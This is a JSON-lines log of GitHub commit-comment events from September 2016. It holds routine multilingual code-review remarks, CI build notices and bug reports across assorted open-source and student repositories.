{"id":"4629850601","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205420,"position":5,"line":166,"path":"src/utils/intpoint.h","commit_id":"04dc8ac68b35c1fbd4ed4cd0c7ca5456bd132eb4","created_at":"2016-09-28T10:40:29Z","updated_at":"2016-09-28T10:40:29Z","body":"Code style: Brackets on new line."}},"created_at":"2016-09-28T10:40:29Z"}
{"id":"4629863686","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19205441,"position":null,"line":null,"path":null,"commit_id":"35a2aa06700b542f80de56cace4ff898ba660142","created_at":"2016-09-28T10:43:25Z","updated_at":"2016-09-28T10:43:25Z","body":"Great! let me know so we can review together"}},"created_at":"2016-09-28T10:43:25Z"}
{"id":"4629865879","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205443,"position":null,"line":null,"path":null,"commit_id":"801e45d5cc7842a5ac35275df1027a80c7ed7cda","created_at":"2016-09-28T10:43:55Z","updated_at":"2016-09-28T10:43:55Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 277](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1251&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 1 (new)) Build time: 00:09:49"}},"created_at":"2016-09-28T10:43:55Z"}
{"id":"4629866389","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"LibreOffice/core"},"payload":{"comment":{"id":19205444,"position":null,"line":null,"path":null,"commit_id":"f8c875a6e9e95120dcd16f7c96e0fbbaa0a3784c","created_at":"2016-09-28T10:44:01Z","updated_at":"2016-09-28T10:44:01Z","body":"Thanks, already working on HarfBuzz update."}},"created_at":"2016-09-28T10:44:01Z"}
{"id":"4629866504","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205445,"position":12,"line":12,"path":"src/layout/variables.scss","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:44:03Z","updated_at":"2016-09-28T10:44:03Z","body":"где альтернативное указание шрифтов, семейство шрифтов"}},"created_at":"2016-09-28T10:44:03Z"}
{"id":"4629869161","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205449,"position":null,"line":null,"path":null,"commit_id":"6bb75ca928e42a3d3b0f9793392480b257688843","created_at":"2016-09-28T10:44:41Z","updated_at":"2016-09-28T10:44:41Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 278](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1252&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T10:44:41Z"}
{"id":"4629871339","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19205455,"position":8,"line":252,"path":"cura/ConvexHullDecorator.py","commit_id":"f3afcb1b366501bac4dddd4c368bbc30e23b8dda","created_at":"2016-09-28T10:45:12Z","updated_at":"2016-09-28T10:45:12Z","body":"Should the convex_hull be a polygon or a numpy array? (we sometimes mix those up)  "}},"created_at":"2016-09-28T10:45:12Z"}
{"id":"4629874093","type":"CommitCommentEvent","actor":{"login":"whtie"},"repo":{"name":"whtie/white"},"payload":{"comment":{"id":19205458,"position":null,"line":null,"path":null,"commit_id":"2b7a119038b59104747442c19aa74c4d2b26eda2","created_at":"2016-09-28T10:45:49Z","updated_at":"2016-09-28T10:45:49Z","body":"as good as"}},"created_at":"2016-09-28T10:45:49Z"}
{"id":"4629876010","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"tyushin/KotlinAsFirst2016"},"payload":{"comment":{"id":19205460,"position":5,"line":83,"path":"src/lesson2/task1/IfElse.kt","commit_id":"9fe629d8d088ae90ca25c2277dca3583c2f081f4","created_at":"2016-09-28T10:46:14Z","updated_at":"2016-09-28T10:46:14Z","body":"Артём, вам следует создать Pull Request, чтобы отправить ваши коммиты на проверку. О том, как это сделать, написано здесь https://github.com/Kotlin-Polytech/KotlinAsFirst2016/blob/master/tutorial/chapter00.adoc в разделе про учебный проект."}},"created_at":"2016-09-28T10:46:14Z"}
{"id":"4629876474","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205461,"position":35,"line":182,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T10:46:21Z","updated_at":"2016-09-28T10:46:21Z","body":"Only used in the post-wipe case."}},"created_at":"2016-09-28T10:46:21Z"}
{"id":"4629877806","type":"CommitCommentEvent","actor":{"login":"kuzukuzu"},"repo":{"name":"udon9/kadai"},"payload":{"comment":{"id":19205465,"position":1,"line":1,"path":"README.md","commit_id":"87538b06cc1d76b0205a40980c177f1279665436","created_at":"2016-09-28T10:46:40Z","updated_at":"2016-09-28T10:46:40Z","body":"comment test"}},"created_at":"2016-09-28T10:46:40Z"}
{"id":"4629885223","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19205477,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T10:48:22Z","updated_at":"2016-09-28T10:48:22Z","body":"Right now, I'm developing a Joomla component. We didn't decided to standardize the JS/Ajax process right now, indeed, we decided the exact contrary. That refactorization task is an important one, it must be done really well. \r\n\r\nFYI: one of the most important task of the team is to finish to integrate fully LimeSurvey into Yii.\r\n\r\n**LimeSurvey is full of huge helper classes.** Many of those helpers have been created by single coders, who just wrote a part of the software in their \"own\" way of doing, outside of any standard. That's why for example the logic of Template editor is totally different from the logic of CPDB which is totally different from the logic of condition designer, which is completely different from the logic of Qanda, which is totally different from the Statistic logic, etc. etc. Each time you come to one of those classes that are outside of Yii logic, you must read it entirely, try to enter inside of the developer brain who wrote it to try to understand what was is his way of doing. So the problem is not to know if the way of doing of that coder was good or bad (btw: be sure that each coder was  persuaded to have the best way of doing, and that his way of doing should be the new standard for LimeSurvey.) The problem is that we have too much different ways of doing.\r\n\r\n**So, one of the job we're doing, like I started with qanda helper, is to integrate little by little  the methods of those helpers in the right place, following the MVC pattern, extending the Yii classes .** Doing this, the code become more standard, the logic more obvious, and any people who learn how to use Yii can read and understand the code. \r\n\r\n**Creating new helper classes, out of the Yii Framework, with logic specific to a single integrator, is just the exact contrary of that goal. You're going in a direction, whereas we're going to the exact opposite.** :\r\nWith that commit, we're going to have a new helper class, specific to the logic of a single coder, outside of the framework. "}},"created_at":"2016-09-28T10:48:22Z"}
{"id":"4629900337","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"petianastasia/KotlinAsFirst2016"},"payload":{"comment":{"id":19205493,"position":5,"line":54,"path":"src/lesson1/task1/Simple.kt","commit_id":"a8d03a92553c3adca18e8ca0d8054bfea8c75fac","created_at":"2016-09-28T10:51:50Z","updated_at":"2016-09-28T10:51:50Z","body":"Анастасия, вам следует создать Pull Request, чтобы отправить ваш коммит на проверку. О том, как это сделать, подробно написано здесь: https://github.com/Kotlin-Polytech/KotlinAsFirst2016/blob/master/tutorial/chapter00.adoc в разделе про учебный проект. Учтите, когда будете это делать: вы в своё время создали fork не нашего репозитория, а репозитория вашего одногруппника nightonyx. Pull Request необходимо отправить именно в наш репозиторий, для этого при его создании необходимо будет вручную поменять base fork на Kotlin-Polytech."}},"created_at":"2016-09-28T10:51:50Z"}
{"id":"4629902625","type":"CommitCommentEvent","actor":{"login":"masastat"},"repo":{"name":"masastat/MorisLecture"},"payload":{"comment":{"id":19205497,"position":1,"line":1,"path":"test.txt","commit_id":"478be913e54b40bd6c25af9a2b5904a910cb5e32","created_at":"2016-09-28T10:52:20Z","updated_at":"2016-09-28T10:52:20Z","body":"what is this line for?"}},"created_at":"2016-09-28T10:52:20Z"}
{"id":"4629905270","type":"CommitCommentEvent","actor":{"login":"MathiasCiarlo"},"repo":{"name":"gardir/Devilry_sort"},"payload":{"comment":{"id":19205501,"position":null,"line":null,"path":null,"commit_id":"2af04a1eb23766a644462270515ac6f7113fc5b3","created_at":"2016-09-28T10:52:56Z","updated_at":"2016-09-28T10:52:56Z","body":"Someone has something boring on the agenda? ;)"}},"created_at":"2016-09-28T10:52:56Z"}
{"id":"4629905683","type":"CommitCommentEvent","actor":{"login":"anotherjames"},"repo":{"name":"computerminds/cm_config_tools"},"payload":{"comment":{"id":19205503,"position":5,"line":134,"path":"src/ExtensionConfigHandlerInterface.php","commit_id":"21b55bc856827a53c947f24e96b6a73b8193fd55","created_at":"2016-09-28T10:53:02Z","updated_at":"2016-09-28T10:53:02Z","body":"grammar: extension's\r\n\r\nGood function name though, I like that 👍 "}},"created_at":"2016-09-28T10:53:02Z"}
{"id":"4629906676","type":"CommitCommentEvent","actor":{"login":"soffes"},"repo":{"name":"apple/swift-protobuf-runtime"},"payload":{"comment":{"id":19205504,"position":null,"line":null,"path":null,"commit_id":"6b1a0b0a270f31b93c3d4255d94f8d8f2f9e1ae0","created_at":"2016-09-28T10:53:14Z","updated_at":"2016-09-28T10:53:14Z","body":"If there are other protobuf libraries out there, you probably wouldn't ever try to use them at the same time you use this one :)\r\n\r\nAlso it allow to rename things like `ProtobufGeneratedMessage` to just `GeneratedMessage` since it would be in the `Protobuf` module. If you needed to disambiguate, it would just be `Protobuf.GeneratedMessage` which I think is great :) If I had to do `SwiftProtobuf.ProtobufGeneratedMessage` or `SwiftProtobuf.GeneratedMessage` as a type somewhere, that would be a bummer.\r\n\r\nEither way, I'm really happy this libraries exists :) Thanks for your hard work on it!"}},"created_at":"2016-09-28T10:53:14Z"}
{"id":"4629907634","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205506,"position":61,"line":221,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T10:53:28Z","updated_at":"2016-09-28T10:53:28Z","body":"I find these bonus brackets sort of confusing. Might be a matter of taste though.\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-28T10:53:28Z"}
{"id":"4629908107","type":"CommitCommentEvent","actor":{"login":"dianaomigie"},"repo":{"name":"ucbvislab/radiotool"},"payload":{"comment":{"id":19205507,"position":null,"line":null,"path":null,"commit_id":"ee8472344f031973aa13522e8079f4556da0f80b","created_at":"2016-09-28T10:53:34Z","updated_at":"2016-09-28T10:53:34Z","body":"Hello there, I am interested in your novelty function. Is there a problem with the build_table_mem_efficient module? I keep having problems there. Thanks in advance"}},"created_at":"2016-09-28T10:53:34Z"}
{"id":"4629908370","type":"CommitCommentEvent","actor":{"login":"moleisking"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19205509,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-28T10:53:37Z","updated_at":"2016-09-28T10:53:37Z","body":"A simple if statement would be enough. We don't need ai yet. If we used ai\nwe would need to record all locations.  Every  movement. There is a case to\nadd up to 5 coordinate fields\n\nOn 28 Sep 2016 12:34, \"goodbytes23\" <notifications@github.com> wrote:\n\n> When you register, isn't your city and current place the same?\n> Nah, fuck ids, i user artificial intelligence to find what data belongs to\n> who. Of course Sherlock, how otherwise :)\n> Not yet. Let finish this and not slow down the process, other wise moving\n> it all to mongo right now will take more time and delay.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/moleisking/SAM/commit/4b748139fce911da21abbf4dede080d0f6f0e9d9#commitcomment-19205357>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADPVJP2V9OGmugX-s-obs86Ss9sS3FnRks5qukKhgaJpZM4KIBWv>\n> .\n>\n"}},"created_at":"2016-09-28T10:53:37Z"}
{"id":"4629912426","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"gregismypepper/KotlinAsFirst2016"},"payload":{"comment":{"id":19205512,"position":10,"line":53,"path":"src/lesson1/task1/Simple.kt","commit_id":"6a99823f887f269c975a739fa5e99a70fee55a50","created_at":"2016-09-28T10:54:31Z","updated_at":"2016-09-28T10:54:31Z","body":"Григорий, вам следует создать Pull Request, чтобы отправить ваш коммит на проверку. О том, как это сделать, подробно написано здесь https://github.com/Kotlin-Polytech/KotlinAsFirst2016/blob/master/tutorial/chapter00.adoc в разделе про учебный проект."}},"created_at":"2016-09-28T10:54:31Z"}
{"id":"4629914327","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19205519,"position":57,"line":217,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T10:54:57Z","updated_at":"2016-09-28T10:54:57Z","body":"Good candidate for a unit test!"}},"created_at":"2016-09-28T10:54:57Z"}
{"id":"4629917142","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"alekszalata/KotlinAsFirst2016"},"payload":{"comment":{"id":19205527,"position":5,"line":63,"path":"src/lesson1/task1/Simple.kt","commit_id":"de6c71651476829e9058fd997447dbdc4221fb38","created_at":"2016-09-28T10:55:36Z","updated_at":"2016-09-28T10:55:36Z","body":"Алексей, вам следует создать Pull Request, чтобы отправить ваш коммит на проверку. О том, как это сделать, подробно написано здесь https://github.com/Kotlin-Polytech/KotlinAsFirst2016/blob/master/tutorial/chapter00.adoc в разделе про учебный проект."}},"created_at":"2016-09-28T10:55:36Z"}
{"id":"4629918346","type":"CommitCommentEvent","actor":{"login":"ttauri"},"repo":{"name":"kundunlv/js"},"payload":{"comment":{"id":19205531,"position":null,"line":null,"path":null,"commit_id":"45943204b679d1a5b49d44b342f21b49d3530936","created_at":"2016-09-28T10:55:53Z","updated_at":"2016-09-28T10:55:53Z","body":"Да, его можно удалить"}},"created_at":"2016-09-28T10:55:53Z"}
{"id":"4629918565","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205532,"position":44,"line":44,"path":"webpack.config.js","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:55:56Z","updated_at":"2016-09-28T10:55:56Z","body":"зачем?"}},"created_at":"2016-09-28T10:55:56Z"}
{"id":"4629920552","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-JasperSzkudlarski"},"payload":{"comment":{"id":19205534,"position":null,"line":null,"path":null,"commit_id":"16e4ff070c63f0ce5cf597fbff41beacd0b32855","created_at":"2016-09-28T10:56:22Z","updated_at":"2016-09-28T10:56:22Z","body":"Nice. Dit is de oplossing dat ik verwachtte."}},"created_at":"2016-09-28T10:56:22Z"}
{"id":"4629921925","type":"CommitCommentEvent","actor":{"login":"CoDEmanX"},"repo":{"name":"kc5nra/obs-browser"},"payload":{"comment":{"id":19205538,"position":null,"line":null,"path":null,"commit_id":"2eaf69f7a3d2ac98a45d5cc96124ab7c666bfa2f","created_at":"2016-09-28T10:56:42Z","updated_at":"2016-09-28T10:56:42Z","body":"Looks like this commit helped to reduce (but not fix) crashes on closing down OBS while a video on YouTube is running in the browser source. In v0.15, it crashed roughly 50% of the time on my laptop, not on desktop computer however. With v0.16.1, I got it to crash only once out of 20 attempts."}},"created_at":"2016-09-28T10:56:42Z"}
{"id":"4629923771","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19205541,"position":17,"line":17,"path":"Assets/MyEpicControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T10:57:07Z","updated_at":"2016-09-28T10:57:07Z","body":"print()"}},"created_at":"2016-09-28T10:57:07Z"}
{"id":"4629924363","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205543,"position":null,"line":null,"path":null,"commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:57:15Z","updated_at":"2016-09-28T10:57:15Z","body":"гарнитура  шрифтов не та"}},"created_at":"2016-09-28T10:57:15Z"}
{"id":"4629927166","type":"CommitCommentEvent","actor":{"login":"JRubis"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19205550,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-28T10:57:54Z","updated_at":"2016-09-28T10:57:54Z","body":"Yes that is correct. We tested it with that modification and it solved the problem we were seeing.\r\n\r\nFrom: Tengfei.Chang [mailto:notifications@github.com]\r\nSent: Wednesday, September 28, 2016 6:10 AM\r\nTo: openwsn-berkeley/openwsn-fw <openwsn-fw@noreply.github.com>\r\nCc: JRubis <john.rubis@hotmail.com>; Mention <mention@noreply.github.com>\r\nSubject: Re: [openwsn-berkeley/openwsn-fw] FW-559. separate busySending variable for DIO and DAO. (6146abe)\r\n\r\n\r\n@JRubis<https://github.com/JRubis> you are absolutely right! so the fix should be clear both flag right after the packet are removed, right?\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/openwsn-berkeley/openwsn-fw/commit/6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8#commitcomment-19205124>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AM3eGI1Cv5BUMpWoZq_VoJBohbHfZIIbks5qujz4gaJpZM4KHy1I>.\r\n"}},"created_at":"2016-09-28T10:57:54Z"}
{"id":"4629928463","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205553,"position":null,"line":null,"path":null,"commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T10:58:13Z","updated_at":"2016-09-28T10:58:13Z","body":"шрифты не те..."}},"created_at":"2016-09-28T10:58:13Z"}
{"id":"4629928912","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"pytest-dev/pytest-django"},"payload":{"comment":{"id":19205556,"position":null,"line":null,"path":null,"commit_id":"2d6916eae365a1aaa26b86be9c8a6611f3cad531","created_at":"2016-09-28T10:58:20Z","updated_at":"2016-09-28T10:58:20Z","body":"The `try` method with the common case is more pythonic:\r\n\r\n> EAFP ('easier to ask forgiveness than permission') is better than LBYL ('look before you leap')\r\n\r\nSee e.g. http://stackoverflow.com/a/903238/15690.\r\n\r\nBut that's just nitpicking (but also teaching.. ;))."}},"created_at":"2016-09-28T10:58:20Z"}
{"id":"4629929707","type":"CommitCommentEvent","actor":{"login":"petetnt"},"repo":{"name":"js-hacks/jshacks.io"},"payload":{"comment":{"id":19205557,"position":1,"line":1,"path":"_includes/base/header.html","commit_id":"5dd512fc249379b91355e89fbeca4e3516a5c1aa","created_at":"2016-09-28T10:58:30Z","updated_at":"2016-09-28T10:58:30Z","body":"Nice commit message 👍 "}},"created_at":"2016-09-28T10:58:30Z"}
{"id":"4629930710","type":"CommitCommentEvent","actor":{"login":"Lenzeg"},"repo":{"name":"Lenzeg/SOGM"},"payload":{"comment":{"id":19205558,"position":4,"line":7,"path":"1_bewerk.sh","commit_id":"618b7c06f6859a593e885065821c3e42a07f3f34","created_at":"2016-09-28T10:58:43Z","updated_at":"2016-09-28T10:58:43Z","body":"Request permission to start"}},"created_at":"2016-09-28T10:58:43Z"}
{"id":"4629932434","type":"CommitCommentEvent","actor":{"login":"scipioni"},"repo":{"name":"openstack/charm-keystone"},"payload":{"comment":{"id":19205560,"position":null,"line":null,"path":null,"commit_id":"ccf153981f540db5429bcbe1fc9c010cf92f9acd","created_at":"2016-09-28T10:59:06Z","updated_at":"2016-09-28T10:59:06Z","body":"In **mitaka** release after adding more units to keystone application results that in first deployed unit we have a good _/etc/keystone/policy.json_ with domain_id:\r\n\r\n```\r\n...\r\n\"cloud_admin\": \"rule:admin_required and domain_id:ce2f6888465941c4b6d7c5d12a4e5887\",\r\n...\r\n\r\n```\r\n\r\nIn other units, from second to last, broken /etc/keystone/policy.json_ appears instead:\r\n```\r\n...\r\n\"cloud_admin\": \"rule:admin_required and domain_id:admin_domain_id\",\r\n...\r\n```\r\n"}},"created_at":"2016-09-28T10:59:06Z"}
{"id":"4629933360","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19205563,"position":10,"line":10,"path":"Assets/XControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T10:59:18Z","updated_at":"2016-09-28T10:59:18Z","body":"private _const_ int\r\nесли имеется ввиду константа"}},"created_at":"2016-09-28T10:59:18Z"}
{"id":"4629933706","type":"CommitCommentEvent","actor":{"login":"afruth"},"repo":{"name":"js-hacks/jshacks.io"},"payload":{"comment":{"id":19205564,"position":1,"line":1,"path":"_includes/base/header.html","commit_id":"5dd512fc249379b91355e89fbeca4e3516a5c1aa","created_at":"2016-09-28T10:59:22Z","updated_at":"2016-09-28T10:59:22Z","body":"This wins the internet for today"}},"created_at":"2016-09-28T10:59:22Z"}
{"id":"4629936435","type":"CommitCommentEvent","actor":{"login":"Hjsmallfly"},"repo":{"name":"daidaijie/SyllabusApplication"},"payload":{"comment":{"id":19205565,"position":null,"line":null,"path":null,"commit_id":"4370d824a09d70a6a0808f4f68787bec980025bd","created_at":"2016-09-28T10:59:55Z","updated_at":"2016-09-28T10:59:55Z","body":"有毒的戴杰"}},"created_at":"2016-09-28T10:59:55Z"}
{"id":"4629936673","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19205566,"position":16,"line":16,"path":"Assets/XControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T10:59:59Z","updated_at":"2016-09-28T10:59:59Z","body":"0 - значение по умолчанию"}},"created_at":"2016-09-28T10:59:59Z"}
{"id":"4629943139","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19205579,"position":47,"line":47,"path":"Assets/XControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T11:01:22Z","updated_at":"2016-09-28T11:01:22Z","body":"private _const_ int"}},"created_at":"2016-09-28T11:01:22Z"}
{"id":"4629944818","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205584,"position":41,"line":41,"path":"src/layout/footer.scss","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T11:01:45Z","updated_at":"2016-09-28T11:01:45Z","body":"зачем лишний каскад?"}},"created_at":"2016-09-28T11:01:45Z"}
{"id":"4629945839","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205587,"position":42,"line":42,"path":"src/layout/footer.scss","commit_id":"6d3cf2917b8d2daff0a0246d51a33f4cac0b5458","created_at":"2016-09-28T11:02:02Z","updated_at":"2016-09-28T11:02:02Z","body":"зачем делаем блочными ссылки?"}},"created_at":"2016-09-28T11:02:02Z"}
{"id":"4629946949","type":"CommitCommentEvent","actor":{"login":"idsv14"},"repo":{"name":"dite-bth/Bucketlist"},"payload":{"comment":{"id":19205590,"position":null,"line":null,"path":null,"commit_id":"8c3eab9da5c3f4b79c530fc9561fcc41656571ca","created_at":"2016-09-28T11:02:17Z","updated_at":"2016-09-28T11:02:17Z","body":"try 1.0"}},"created_at":"2016-09-28T11:02:17Z"}
{"id":"4629948332","type":"CommitCommentEvent","actor":{"login":"angelixo"},"repo":{"name":"smartdatasoft/smartblog"},"payload":{"comment":{"id":19205592,"position":null,"line":null,"path":null,"commit_id":"c662d2789d4a48253303350c296c1e2389f076ec","created_at":"2016-09-28T11:02:36Z","updated_at":"2016-09-28T11:02:36Z","body":"Hi!! I have the same problem, \r\n\r\n> Consulta SQL incorrecta\r\n> Unknown column 'a.smart_blog_post' in 'group statement'\r\n\r\ni just need to delete  \"parent::__construct();\" on\r\n\r\n`<?php\r\nclass AdminBlogPostController extends AdminController {\r\n\r\n    public $asso_type = 'shop';\r\n\r\n    public function __construct() {\r\n        $this->table = 'smart_blog_post';\r\n        $this->className = 'SmartBlogPost';\r\n      //  $this->module = 'smartblog';\r\n        $this->lang = true;\r\n        $this->image_dir = '../modules/smartblog/images';\r\n        $this->context = Context::getContext();\r\n        $this->_defaultOrderBy = 'created';\r\n        $this->_defaultorderWay = 'DESC';\r\n        $this->bootstrap = true;\r\n        \r\n            if (Shop::isFeatureActive())\r\n                 Shop::addTableAssociation($this->table, array('type' => 'shop'));\r\n\t\tparent::__construct();\r\n\r\n`\r\n\r\nthat last line in the code?\r\n\r\n\r\nthanks you guys. "}},"created_at":"2016-09-28T11:02:36Z"}
{"id":"4629954712","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-JorenLuykx"},"payload":{"comment":{"id":19205607,"position":null,"line":null,"path":null,"commit_id":"47faf263b07cd591fb6205689edd70efe45cd854","created_at":"2016-09-28T11:04:04Z","updated_at":"2016-09-28T11:04:04Z","body":"Yup, dit is de oplossing die ik verwachtte.\r\nGoed gedaan."}},"created_at":"2016-09-28T11:04:04Z"}
{"id":"4629957335","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205612,"position":11,"line":11,"path":"src/ru/neoanon/service/RedirectService.java","commit_id":"29311298f138436ce139feec614eef652564c5e0","created_at":"2016-09-28T11:04:41Z","updated_at":"2016-09-28T11:04:41Z","body":"Вот прям билдер, как ты имплементировал, в живую"}},"created_at":"2016-09-28T11:04:41Z"}
{"id":"4629959367","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-Dragonites"},"payload":{"comment":{"id":19205619,"position":null,"line":null,"path":null,"commit_id":"ef1d0af6aaa176a448b342a653f0a514ed8896df","created_at":"2016-09-28T11:05:09Z","updated_at":"2016-09-28T11:05:09Z","body":"Die vorige opmerking ging meer over uw eerste oplossing waar ge vanaf gestapt zijt.\r\n\r\nMaar wat houdt u nu tegen om die originele constructor weg te werken?"}},"created_at":"2016-09-28T11:05:09Z"}
{"id":"4629959743","type":"CommitCommentEvent","actor":{"login":"nre-ableton"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":19205620,"position":null,"line":null,"path":null,"commit_id":"d2ff373e395ca409aad1487a9894e302e554498a","created_at":"2016-09-28T11:05:14Z","updated_at":"2016-09-28T11:05:14Z","body":"Thanks :)"}},"created_at":"2016-09-28T11:05:14Z"}
{"id":"4629959891","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19205621,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T11:05:16Z","updated_at":"2016-09-28T11:05:16Z","body":"Well, as Markus suggested, it might be a good idea to move the short methods in the helper class to LSYiiController, so it's accessible from everywhere."}},"created_at":"2016-09-28T11:05:16Z"}
{"id":"4629960058","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"usmetanina/sharp-skb"},"payload":{"comment":{"id":19205622,"position":14,"line":23,"path":"Task1/Task1/Program.cs","commit_id":"299ba0dfd58d24dc9548f26e7dbb03be3587d883","created_at":"2016-09-28T11:05:19Z","updated_at":"2016-09-28T11:05:19Z","body":"Вас не смущает, что для того, чтобы получить площадь приходится вызывать два метода подряд? Что случится если я перепутаю порядок? Что случится если я просто вызову второй?"}},"created_at":"2016-09-28T11:05:19Z"}
{"id":"4629962736","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205625,"position":57,"line":57,"path":"src/ru/neoanon/servlets/TransactionServletSecond.java","commit_id":"29311298f138436ce139feec614eef652564c5e0","created_at":"2016-09-28T11:05:56Z","updated_at":"2016-09-28T11:05:56Z","body":"мона было так не извращаться, вернул бы просто {\"\"}, ну или к примеру тогда уже более хитропопую структуру передавать."}},"created_at":"2016-09-28T11:05:56Z"}
{"id":"4629963420","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19205627,"position":null,"line":null,"path":null,"commit_id":"3cd020babadfc51fa2ee47d27f2a9faed413716b","created_at":"2016-09-28T11:06:05Z","updated_at":"2016-09-28T11:06:05Z","body":"[Err] 1054 - Unknown column 'entry' in 'where clause' at line 3"}},"created_at":"2016-09-28T11:06:05Z"}
